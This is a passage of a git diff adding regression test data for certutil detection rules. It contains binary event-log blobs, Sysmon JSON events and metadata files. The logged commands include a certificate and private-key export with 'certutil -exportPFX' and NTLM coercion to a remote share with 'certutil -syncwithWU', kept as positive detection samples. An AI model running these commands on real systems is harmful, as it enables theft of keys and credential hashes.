z&0Yb1wRe3oqE7GJ`hm*J!sq|v+~h0Vua3i~uC#u2^P!I}l3%eC=9c-sUuXL({3DLJ z{>qi;ID>F@02dH)Z6y{5OJVXjT{gt)U^bKJPf;(zYB>JP2X`u|_0 z&9_P$FTCChT!~)z$Dpv&>>_K|x%1{fg7*U2`Bm1=4}LscW;?qQ3)$IeCU&;(0J;AI zqU85K+BstF99(+M`!<)gJ-ZUU?A&{KS~IcpV%WLC+PV5?*OuANuEauicAANu7sJk1 zTRT5F^NBsFvbJYeqL-ad<1NBzCU#y7J6~h%{BN)SRGIDUN-Sh&r(T?7Y_6Ikh47i&JH7 z&#pu-JAXc+l+#S?ycl+VjkWXH6W5p7&aT8lc6OSHofpH->#UvkKNM;|Th{jMO7yaG zl>d#{Y9@AG3_Gv4X#V#|O_}ZNN-Sh&rw>KKX_%bz5oCK literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json new file mode 100644 index 000000000..9ec2762cb --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:23:42.049726Z" + } + }, + "EventRecordID": 11818106, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:23:42.043", + "ProcessGuid": "5AA13A44-079E-68FD-0236-000000004002", + "ProcessId": 2456, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -p secret_password -exportPFX root 1c6119aff8414c91487c4e02d18dd73D c:\\cert.pfx", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml new file mode 100644 index 000000000..83cf4ab17 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/info.yml @@ -0,0 +1,13 @@ +id: 387ea4f5-f74d-4b14-a1a7-db8c97fb56c2 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5 + title: Certificate Exported Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx new file mode 100644 index 0000000000000000000000000000000000000000..394724e61fc22aa75070cd1a7972b8468a578ba1 GIT binary patch literal 69632 zcmeHQdwdnuwch9CB!rL$PsLho&{pxm`<0-SgggKV5+R6MC_)lQAP-7{6|61wS+Ah& zuk}~1w^~K4TD`VZsZ^m*t&gj{Xca5PN@Jha+WNj?eQ>{T&t5rm4to#+JN;v3@;jM1 zbN0+yv%hbzz4qFVsc2eM+1OOC(zm!du^Rih%229zEIr9#e=mLigU=uKO`;n_IS}PQ zlmk%?L^%-UK$HVf4n#Q+Xn557p1CkegeV}hq~?fglq1AOm4?PCb#!Y z`X|kKp8GGHTa>2HM10?Cf+U|xlhJJM#cS^}$J3Fv68C&C?LJI%uv-jy(3R~Z3FcTX zKJ`?b?5#TS-@Uf~r8_Hr7b}RxRBr5}g)KwmY93GA_w)rDiYh<+0k+s?t7c zJr4PR+#bx$R2AwXRj*o9JHB6yPu3Fi;>mE*UQ@yR0P zc$-sp=csdViv`HCMm&C_R)JZUpHNxx{0xvm+SDkLOUO*)ZcqPY4rzI@v7wBnM4s?k_1)k)$M7*mD#!Xm)!-s7{> z3;;-2m_-y9}oq0)43W9PGvL{RR$%y5EElFEanUUwq?U}eCRi-9h&d2j} zR1S5y5*LXdLvgaD9Z%}rH@}A}$f8jo z>|-A7qbS{wj8Tn#bBbqJog7O)V}cKokZOYtl3z8IGbMZUD+ z9QjTpCP9Fh=v#(n18jn}0#|q$tkh?aB1^3GqN*%48&6Ex=Baa4zl=nFA2le!sta~5 zp+Dd;sx$8yv(*5Vt@_|s6aXCYldW=eI$W;L568FOsz6P_K9(~`-$m+5wOXv^Yq?6@ zS)f$E{+skwnJ6mUGAVjGbWSy8L)09cYe9~*B6r%5N1i!q#`hLAzi8QW&zK)O>zc0pVwH z$U2!@`DLV^nD%mg+XXmJt67Xa>u9p@KUx#8WE9F@kHII4)-n^~W&*n=z#|qjo(D(> z^ykd=M<-MF0F>>>F)7sXJZQwULrhu?y?5tcX_ObU8_$cY0$y{9x#rm9{r4{>bt;~h zp|Y8NkV#MUjrN(K6ssljG@b_<1?p0X+~!lJn&Eg}<^irLM|xI%WcIR7yyAIT2go0< zYN|t?((J_ZdK@4vZ5WFtOWI1L&GyocGtbHVG0)i>yrCA0@o7Q&CMD04M6Krmp2U;H zoFcQU^j(-^C{WBXtHd&0rfFg6HI(BT9`mVaps8;!?`mRBp0TtVeG{EUKAxBBrLv-3 zg?la5B`e7e7+LCMWnVJ=R6IvKFW;-Egz2XxHRuD5vYgRb@p6oIil)~qb>8&_9bVpSvFViDgUH%<(*0TWEQrxpF}A$}AWpI!bhz+Mr_}FQrw-YNV7L_Lw6T zL^416digQNNYa(9SHcQV!h){%p0A(xd;z61d9A+`^*=~`gE%$7yPjB(6~`rWCMQK- zsTAUQN8yTuqM3=qln*s#ohH8o$5r?Y#D`}7RC8Q|{Um%w;=?L{)rD6@#MD)=l03)n zWAXc$CfyM2l#WzmVADsyE#>zysu0KH;OLG-TK*pm`9<1kEgygD1tr-ZHT0uzsY>Eg z!0$4onVVKa%uR83M&TZFQA)_Yc9bAm`6k@6Ui%1?J5+z@AdiByB77eW9me8Yp&D%N zJqcIxx;p&I--c_AN9b#*-EegZbn#@+BKu|RUnkv*JEzuaJVXC5Srf6YFHCuo{qIw# zor&eRjus$Ug9T}lo(qMLFa%{{B}!JU_C4BBO6I^;6e7>&>Sy$Fhfg{J`7#&fccs3D z-VRHOhk$UW4Jk^IOI|5&#J$^%X4G<QKqW7UX0ruBUs;^fmY^#hs?1?kh#THyKsv zf$l>lTz~Ed4S&3GCaIug4{sN&q*ZP}&P~C+MyLtEk&LPUw}|N^Sn4wUy$o27!}k%` zkAP-lboz04$}vbiTBj{S>M>wY5&p`}wWq^NVd@D;&wGx*z8L$lnyqE}Y?)3m8s|rt zt31{e-b`0)Us!lgrlJ{eAKi+kc)~!fuFdEWF867L}OF52@uV-#out8Ey6jnq8L{f<8OriE5rY>kjc_Sq+ToduwgJ8RVcH!3_O%F+pNo* zS5i-a~Dt;U9xS$^ zs?{(2dcXL9&9kNu@vOx}+C1xpT9E>^3i|~Lo^_vu`VNlGRw5GbeWLK4%YLwS$~PD9 zylwp7@GD%(%{`KuDe<-YAy_f4o9IXod@|il9 zymnwca(tFL_OaqVQ#YM6>AL4m{#?%Sd!BGFG030Kjh(w;^wnG8Ni)kUk#)@G{q-3S zj-^^=o|%bfpN0K+JQZ7|%#(U;*;e9i9t_?S4O=fsQHL)R3RR4K5Bn2;xr$>oC`Z37TvU4 zi8Jx82JX)pyl2mMiTCZq8(k(0tD3DuB--#^c2ZKa5aWIMm!`MfexjFQJbwLwj`{aq zasS_c@tFxr%5mEC(G}tFMnu2a564LO!|9Rm>DmS~z#7!0^}Mk&lmi-K;0`06?0I1? z6um|E_Ob_Nu#R3c7B)`D%os;zbdH@Y=oD1-iVDY zd-{c5T(6DgvJ=sjD8VS({Gt{PW~*VgJjnPnQ^WLZ_} zLKXAly361?=&Rk0t4IvORWyrmO~IArwOK7ee2$}W#0Kl0CqJ&gHMq`kimS~Ii^L#Y zMY9Ok{p>IYHgk-TplaG%eq47OTrcZ(Tt#9KuA*6ls|D9ul-6YZ>W$T$DY)*1-}Iuv z^`@&_+TrOIzeywp;VPO%xN2P4?xEjw;J8T@;wiK6cRr#jsWB9c2O!?`ml-$vox#1~ zdY8B_wcsuigK!tkBHT6Z)du%N9~a@pL^wuf0mg@=_N0lW=LoQRiKDXL zwDDl)r;?h5m&xS|GF|UhI_PJpk8F8ikXFc$HgKw=Zk7FZB^{DAqjDqtfgC(Qh5(_2fjXJv0D)m119R~LsZg5$y zZMciXAlyZ>2=~Lro!Fz_TyQT$z5cSneWz30+f2Q_SU-YRqeLVI;Vznm826p4UjNGT zW=T07pSS+>8g*UfQM>-U?Bhe}FQYZ!tQz)$(cj~&);Px3W@F|EZ3){ClPO+`PeH;*x)y-&=-Q|!sF0na!CnllkN8-?==hU$3- z{67jKH`xDLgr3@wNQFt&sKEPa1~wkQm~rC#OP^nN?UTdvzFmcLhIb`66y9-`AbFQEOVDe3O251}w=g*; zlN|Ky6K2)vasAcsR%_5ES*A`z|1CFqvaRF`dD8(~_9w%e!f`HnV{4y?L>q5j!~8ta zEX2G?Z=ZN$G&qNsV>K#KGtq;s)vZp>8P;1&<0|<6+2FgQoq%__R4@>jE09g087wkT(taz;HPOkCO`-5>R&==FNU zA8i0X{wn4Fr#CzF3$~&BXY@`$HM+-oD_LnI+W7GmI7*^fi20G&k@v+brzu5_@ObQi zZRf0QyW+(gcAYV73Ubl-1!v+={DNUPre81!d*hGh>ga{ES7w1HTtk3!tUbTf^9eY! z-QTY9=2x?2GhP+KtJEV#aHSU)@qXoKFwQvUdMn8p*r&iVbRlQdB14ZawQz%DY*X4;QIG&$5kW-;VPO%xayW< zDz4IBtqUsuE!vhjR&ebAzONcwCq3Y@UaG!wm6?NzZ z&?oThyhb^m;`jgE;QP;R$5$lU@MXJBG>h=nl^FY-{B1Z}8=v^1&S$x$T^^2l_ceoW z^@A?U@8xXQp}uX^}o{v{=Z2X8( zKI7N12_SymI2_Zj;~;zE*Y!s1##;k%m5xN$V_r`qY(Sfug75Un{QeyyiC;jJa2{@e zO?blnH^7&F7{0VQ<;zPZ4lvor7m*mm7tt)ld@1?HPhMR+#{-VXn{%G8e&n266Mgp_ zd;c1oHhfu)L*Yvoo?n@WAPx#_J2 z$W?Qeqt}9wNN*`uv|}+!5~C$#eozPSe%;{x@-JQDJfiv46|pT=0ZToC^%j zbv~R$Vi3-vS%kAeZwT=sZrkBky=`!7cZ%D9nAZ-x+J~D+48lz`3o&jtZ@=RG`dXzp zho8qMeCFJ0b#3LgqwlKw2G?LS<&%r=i(hXYK~jU(o~*u}?E8T)&!wB_%j5piYRp5c zky5Mvmhgqt6yu>*{?vniTgmCBGF*Hx6@w6R;Gao7dB<@HC>{(ukIjv*h&3$`2o&+y`o zmt69q%wi8jqKy}{2clVsdEvJQ!+~BhK9DT!TnnBn5pw0JQtWFxR}~@FOYzB&_yFy} zdj{{Lp4{MYe1aZFpEh1rB>w*6Y59G=|F7xS@2q(Htbb8IrPjbx7R^G8w~UuX`P8MA zE8;V<#~Ah(0>`S(^Nm)eiNF@akm=k``@anL+iP%Nb@xVxxIbdb`6Od%ph}5Iw3YLL zy^@-R826j6x##KQFd+IkWCxF5o;&e^S1&$h+xvzc+iJU zc{59@2jTg=F+KjCTx9&2^@lC~%-KwL5YagfiBh(sH%v?HQf zh;jADr|{-T;w9zr1B2UlCqB^4R`v!L}y{Sm_Cc!IbdPr&#ixyTRwI`Wa{O5xq{ zoh?%_0$~W+9A!AClz!g|c`5bC$A+J~o$^!rb!p=XM52wKTz^tD3o$?a@dCb8jpGydp1*LR%as_T(7Tt#9KuA*6lt1heb*NLmwb5Lhi$wM6(d%`N@8PUf)RY><#-H>qm2pmsGECiKl)aSlWCKkr;%h zXcl5T{r|^Au17xK|B!6Ld=6vzxw*D1B}ihP$?q}dhGXJYeZxNeSd%7@N~2p zytPyg)LJOTSb|!tO3ybbFVthx`1a+v*S@gMfAq$+ajqgqvatv1Y>b#_##QER-lv(T zNO?c7y;XwVNsMyN#03eoN2FyUtrL}%qe~Gz8kQz|D+NDbi?KYgTunsp;(J%A;#VBCtcX(dhuM?9a^iKc$cp8Z|JhRcCEt*AmYCOC0{yoSAf`WRfZUO3hvu6M*x-ZAd|PD3wntVAT*>VbFAO(>d$7}wL+-u&jgTRm@{$LqiQ z;@n}e>ppCmcua8#KrD!1oa4TIqj4zxtkxb%_LsJxcY!N*a3vy?eLhm7 zS2eKT*xoyvse5O+poPC@R*pG-l-rZ&u%5v#T(brA(y|<}JTV^A*OaH{e{hDw@??8& zy-2i`C)S^$S%}M%zkingbQQ|OVqG>4zHb(U@yFfz8N5#{sCS6Btz9h=ZS^AC)uLI5 z@%H!2y6;cX>k-fnFz(Xd@M7SHiyiX9_TEO3XtM+KmqfFO7usJsl5sb)-l4?ZxF2A6 zurAi%ng?m^DUoQi59EPp7V+SS^T4cUAUt3@>L|m5E3RMSkO#JSi%7KD1IF1zvxo

v5emC2Cha%DT{=dziRZ27qF(2qBZq4yxAt%63Jec(kv5HX# z{D0Q}o3X#i;QL;tOMDAV9BrX#u%Mk%A`)%*c3?i4Xcl68IiGxbe`(d_5--8+W`kQ^ zR(If5=fh1T2H_@}MYtK@I@d28j{5cc2Db~H;&!DeZ~pn>A~6Uz(JaKcab8&7KyRcw zV=VuU^#YqzE_uRoz8B^F7Q>gu0WQn=H1Z{FUZ_a4@rCuTXcl6=`0L-pTQ897hqV!J z;=UdGTMh182fD=lXk#ZX^VxTiXv3ZLvS=1!+_^>|-*o|;bX=BurG^kUDYxqlem`Ek z(V^dLTjxzA+S=1x=S?&VF@9XZ6~#DHnpU49zZ18aQhuBk7yQR+}Q8&k3L>` zl<@%eb@0l$!m^Y{?tfr#ePhZNhj!M6t4Orrx&`AFM6(E2UB9N{n!cVI-~QYxxIP11 z?=ZNQO?Qc_ZQT@+7=){67Ghk}+sFH_r-lgeMIFSE^=1e5cN#ojKHDXp`h7@g>#2#v zAUs905aY=;)S6+kFfOEXdQya&!@jGw8&fjZz z@bRfGc`%vrNBG<8brl5P0sZ+RF^C7ES%`VSHOOv4D3(LDyT0018*!F?h94QccMtfj z!*Xw1XG{ zI$Q8N$P4m=<9&Z(_|fw(F8N^_?<*36_#v7_{LuVxKi+qU%%f$z;6B5PtDW+~w$7GF zw2fb&-4M+pUT9tfud{VBag=g?zrnNOrr$fP2Xr}4o8KW4ZFtgO5X~YyyQ!SlNjYb` zag*W2b+cY}$P3%LOCm9d7ou6j3(booIsa=0-f4w*So`A!KQ%mP-|CVFwsrVKqKyZP zABkoW4>S+DvJM~W0d<0kN!)7l$d!TASQnQE`niq$=&K5$@5>KK%_?f}|uJ`}q5O-TUP$b%L?~i_b z(JaEfyX^sa@u1xN>c+Obpe^(*1|tJ49tIDDF9SkK4hm2Nje0pY4LJ2KRmK zgU7hT-L@W-NVMV3c%Nt%V%+`xh+SO|3iJN`?Z2NJyl1_8rbE1K?LU!dv)_ydie@3k z+uwiaKJMSSt}5d}+YB%E>@0W43)^~7BGG0C$P3Xd;)Sl)k7PVB=lDHOpkGkpf!uF5 zJQ%XeIS()0(|P#Y}6A=@!^}XTks3w zF1}yAh*B+nZNXnX-fqil>X3%ZK3Cvwal?_4>rs4(-hd#wGF+Y6>#JY$YPm#w*S<6U{=*D}Vd+cw`;tBiWGkIDm}ptqMRg z;!1osWB;hZxBoPk_!bafyf=1{4_}cOgs*58VtiBASEwgm>e$DM`%K+*4y%&f*hdRn zhMa`b+E-UC{_k8Qht);`PD+;f&;SjcQ+6Faho3Q|Iz|M`az0CD^pn;P4Hr_e{ZD1np4mH->{{tENMuGqU literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json new file mode 100644 index 000000000..4fde9eb48 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:26:24.815458Z" + } + }, + "EventRecordID": 11867155, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:26:24.808", + "ProcessGuid": "5AA13A44-0840-68FD-1336-000000004002", + "ProcessId": 4424, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -syncwithWU \\\\10.0.1.14\\my-share", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml new file mode 100644 index 000000000..f5243b532 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/info.yml @@ -0,0 +1,13 @@ +id: 32397458-1d93-45ee-a3c8-9efebb81d9d1 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 6c6d9280-e6d0-4b9d-80ac-254701b64916 + title: Potential NTLM Coercion Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_ntlm_coercion/6c6d9280-e6d0-4b9d-80ac-254701b64916.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx b/regression_data/windows/process_creation/proc_creation_win_chcp_codepage_lookup/7090adee-82e2-4269-bd59-80691e7c6338.evtx new file mode 100644 index 0000000000000000000000000000000000000000..643bec0f9da7505b0da5f6b2a8ea7507ef4fd436 GIT binary patch literal 69632 zcmeI5349bq_Qz``2Sdokjfgl9ZaESlA>qtLLLl6iATA+X0YZW%Cl}kfFhs>C<2OrBA^H; z0*Zhlpa>`eihv?;MFPEZC#B@%O%r@}U)6dZ)r3ibr8R}fn7sO{D^`4k0%Rw2+x{)a zVmAZ}(aI&n*&rdl3N(Hr#2{?%foX`Jy6n2bKF`A@EjPd>E$3zV_vLolwjA3gRq&@5 zK7TJKNg7tLFUMk^hgTYlvESo?VgQ_-jxU7>4;PN$ zo24FF*9{cuVy3nyzKReL0Z9R(KZ@NYOPm{5%>XMyq~g1lcmsG8Ovhls(bVjPf7 z!QoHQTp)Defg;!$9w34P9W_K#Y+$7~s9sHskj18eR35%_hSv~*f#`FM@qr~iVONmI zL_un+T&<9xLQc^L9~w!W_MQ_chG}gvO)KIggAU=w2kHW}tZf`D2BHC}SqKrCb5Kn| zq8UDL&zZX0CHmp(*=Vk*zNZOLpLs|9%{;0YEr0~{exOL;6w3kWmN9)b$VW%5KP?+gzSA>_+K?8E`#=`%G% zidKyL$kjYytYc6vElu|DkkcU|2{jhNaZ*bmj#RHVyqbszrl3I09=olkAk%tHbWBz3 z6h?9>Eu9V<97Hy}Rvia0OLKgtW=L<|KI8{lQ;;tq2dhiXjz_@){F7d|ge#arD>d!H z1Q!VBNVW_hyt;4&I3hJUQ81=u0VJA&lH(wxJk4)vv`FCybd;8kMgfXy)NtMMTpFn9 zkODcU_Z4T5<9h6SyJ#o7YdakAcr**OXd(U|FQ(yJs(mtcX%8;>*hYG%mPm#H4$-UH zyU^IwXfv^g4p@jAQ6iY5^`y*TF&sxsw&hWWirN8z;Wb5*Kv4@tAx!NB9b-7tkI^OS z3YWmZh9wa1=;ab2S~={lZI8yMND(3WV7;<>6Rj2=E5$sHnkAt^tVT5T{N^=nuOM_4 zT7t-QfB5Vj%G!yM*p>$(`Jht(MtV4!j?Z~wZ2XLoZQePW@>XW>xhaoaIQ&!h@1XTc zLP4x`%@S8VwBMak7|#O=y{|F8+gL~62XudmUcE6fJ{bZV1{g7tO;F(;0>)p@wcQ_pe`Gx*D3Y z5X87sJHy}+m2D@>YE7@#T%&^IIqW*aoFanuX)X7;zP$d*-DHArh6M;0m2V=;Q|n9b zgCHpymPn`0FvzG%U(!IEj?y~}JHvu5vrj6@)8I$So>A6b&amLi@X?2+31CWL#~D`b zGG!@-QP-rNHXCJKdf6`WIEjxu&PeEnyqJtv9?ItmKA!SctA3dy(Jc`vQg)_R3lT$y zB4VZ%Q?x!!5tg!sRP00V>8L0`lfO0ey{XMfXVhDzzky|4-We9EmojbbOw=`5>sjUM zK#(P$Ox0IjJ_E<$3=7u>DpvYUf<1kWWu^~cz`J9QA_6$ zD=le*t=_{T(8H?QUq8Ou`teoKJInVq_M$ph>2Fnaq(_@g9(&t#=#``WvbUVub<6u7l?>mdsu1}4=+jS|YA?21L(OJ|`U@+|} z##9&~#(1SWolw&l^pYIBW}vR|S|2BS?X?#r#+^`mJU++3dMjC5GI|?Ds0rHkIFzD& zVzj;D@h)1lE*tYH+PSrXopL+UfWC!dGu5Gw!|rjU_ToA>a4X?M<_4>R^y?H6m0JV)ll2?#w!}zI%#{wWCF> zK_C@ts<{jH=&bEcd-A^VnjQK?wRgn23#`U!wZx*PSXhq3x~=q*^csiyl2DrJq_X5q znpS@od`BLTzq+>xuo?p!F(@C4ZDc!Hv!8%1F`DP`*q(|SjC@Z1s!z^>Z2owM@=yrx6as39HO;vsZ=t`)0QrtDBXMXDbSIspL!-A3P*OKe*@V{EXwT^)+TdayJdu9u+ z+ROoS&A~~-amlr9%h3T#%Jka2{{21QtfLEy-rx3P_p!;#lfDd^eb0gKAUQgDNvbK1 z<1Nig6`-Ux2W9^Hp^`KU zTQ(~~?$fM@=043dl+9~|%ee|FL30&a2|5!D=Q#(SS)fX3W}$2bp%pgJ3(my#OvY8}Upy{+Bl}tR6EB$bGs0eR=H%y)tz{s~7Na$;Lad4ThZkA) z%ob#|GXaiYGoXtS$#ul47k$X}COO_ZF~{rHInHB?W?W~WU$bX^%C+4$PsI;LTqBwB z8CLw(;*&YGAL#RH&jv}`_iT9$e6hHQGwGPtCnWF9Pg%kHbU-<8wpbN!_RRLYM>6kq z;Qg)S-QbpwA}f#2*D7vIlluPFz?&_$&_p0a(QW(7;s)uPJ@ZrE@3lT$@;jQZz(ViO z-92~62M_mp=4f%ZG2O9E&cBkH8Y45O{DH=vB6JC_`5*c%fo6c{48V!mR2OD9s9#Wu zPHQaGP8{b?%Jy23bg_x=+RH5eXNz5$rCoe1Rfy>3v@Ukg2)YFA#h&?TdsR5EN&#w) z^RzxCxyE0r(bV@`jrl)Y26OvBQq1?%AVPRYthC-*)JHmo|asv7R=20uu}ei zt>O#o)tK?I#TdO4iO{A)HLgpMb*{mSJ+lQ@Z5(B;6u-|%uA56A^&wZYyo4?O>*j3F z{u^`quGxIzmH9Pr6#|$}KrCR-{FLj}=OtP`!gr@SkSa}@kIZe)S$Imz|zTOXX@yLepRB;R9; zEo3|n>^ZqC9#h<4&-|1t=X+pi%*`^8M-W%e&%Tp4hS)vjtb}cLt6JwEkXl zEiM@SZ{O?Hn4hsl&U-^|DNNjgytfgw8jTlwW(%&`?>fwt#<3qH*OifX`H-twe#RE_ z8)SPv_{02xn}XBdPRAK2ah;1bd*-KHuRcG!gYyMi|0sF?Slhk=`}Oc9 zonMf=lUK~~p}u*XGv;S((Tq364ff1Wd3%p@UU7r+h>MczsM`jY_%0rsr?e!v4E>FKVyrWN6g(YWztvZNu*oi%AVPRYo+|GRB~OiYU(84>(!W_vBm!P zWqYzVJ5wJB3||uaxe(33wL4zynJu__#aYT1@SBvj9NYDf54oDgj9beY1F+XFAI^O^>+`#v3@MX{Zl&`mLE9GZFlIzGxtt{Yb%+J_jRb1IK zTX6Nx&jN6jpX3_buj{|d_1ZPQN&1sL^nsn;Z@TmALBpJvX73vIK@45g7~#;aZ#;sx zzwq^qBjAF%zEM?j_Wik-Umsy_55PjG_vOS%%|j=`v=lBRWu9I2QSv9 zEqWF%ccB}m`S;dpvS0No9b(e2uGMt|X8Ac=To9e@Ikh3H@9MYa47?RLWD(Uhc(G@G zO7-gVbFbgGU6Ob0;Gq`qHs%EU?>;%c=@%UQB4YT~5E%NW%2bvTN;%H29gFW+8uIBkUM!#sU z-?wW>zRB+_%i3Kwf6DpJwc^XVHRk7Rv3k$>|J;S^4@YS0Vh6?L)wuqMJ@Zq(6?97% z5wLD)9V)rjnz_OPuEzYFEmp;qJ+mLzdB`Vl@3ppct2bq8xnAj6I6X7;Zz?_)2e;mE ze(uEEUpPO%3))cmdDZ!OA{tTV=RfB;CBIk>&${FsKC^FBgWhQKt+@Lt62D%ser?hF zLXglV-H#x8w6o`rox0FU<0IwrEE7QIKWN{FLm~=keo>*Fi)`-bbfc!P}U} zv&E`-vuD2^-ZXAUO5P>ge94>hA!8oT7R`85srggD{B61>rjb+dLl&g6juiaN~ybhw4o&LNlfSJT z@aD;TTmR=iJ(FmJ8`Ie{Kjm6cx5y!|XwQLQ-O{>_DP_;%bwYUudd(6H+F5@%c$Qbl5f(2>mRIVDPOi2n&tLHHqT0Yv-Yi{5>s{k9>w`F zdu9{9QoqYa1{WFmHkEv17LNJITE1-2OuxkqgkaBX!dKU?_IGxSe4`}a7Y1%Qod~Q%q+JjYvq9f ziA0ojJ7?Re zu}v-I%NEV}evcCy_RJ=HW&Y5)R^VTZ@u8LETdUgoKlHGaFIzN=4}&oO%bwYUuhehh z#)Z|5d|OMt-xkhWkzy%dwrIxJgWoUMGn??OBL23Ke2+vvw$WO?Z1Ks7ZqI@*|JD1o zPnVCT8^G!OnE0}1HsP!5w^Dv~ljK`3|J9*smg<)+n(4O={?-6{W)r?L{#MM-+Dg8` zTRt9UEnl|y);_mq)wq)6M>pLv`Af_@kba3Tdu9{9x_&F=XYC|k&+^tEW>~6UwrHl` z75KY^?3qpYO8wqbAwO#``KD*Ik9@{bzHHHq@1bTwuxB>mEAxjfr;}+ym3vS&8otLs;Lp0$y0wB-BI*rCT)TdH5SXr|u@ z@QOXN316vSTmX@8oh9GDOikZsEnl|yeuCT6BE^}pPOQs}Db)4b3ct^@XExz0_1oFC)MeCf ztmK=rVd1Ftmg<)+n#JFpxW1Y_vk70R--_`ePV#-}|NilcwS3v)9Y@`s{%4jYEgjl( 